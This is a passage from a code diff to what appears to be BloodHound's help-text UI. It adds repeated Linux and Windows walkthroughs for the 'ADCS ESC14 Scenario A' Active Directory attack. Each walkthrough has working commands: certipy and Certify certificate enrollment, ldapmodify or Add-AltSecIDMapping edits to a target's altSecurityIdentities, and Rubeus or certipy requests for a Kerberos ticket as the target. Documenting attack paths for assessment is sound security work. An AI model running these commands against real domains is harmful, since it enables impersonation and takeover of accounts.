CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } else { @@ -392,6 +590,106 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx index fe2d54996dc..a05db90c03f 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx @@ -144,6 +144,13 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
+ + https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9 + +
= equivalent to the "AddKeyCredentialLink" edge. + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables + an ADCS ESC14 Scenario A attack. + + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the targeted user, which may be abused in a Targeted Kerberoast attack. @@ -234,6 +239,115 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate + mapping string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Targeted Kerberoast attack @@ -322,6 +436,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Retrieve LAPS Password For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -456,6 +575,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } else { @@ -500,6 +729,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Shadow Credentials attack To abuse the permission, use Whisker. @@ -584,6 +818,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx index 9494b375558..f99c396ede8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx @@ -201,6 +201,104 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate + and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); case 'Computer': @@ -319,6 +417,106 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } else { @@ -393,6 +591,106 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx index b517d2ea870..4c58bbe1740 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx @@ -155,6 +155,13 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
+ + https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9 + +
= equivalent to the "AddKeyCredentialLink" edge. + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables + an ADCS ESC14 Scenario A attack. + + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the targeted user, which may be abused in a Targeted Kerberoast attack. @@ -215,6 +220,115 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName 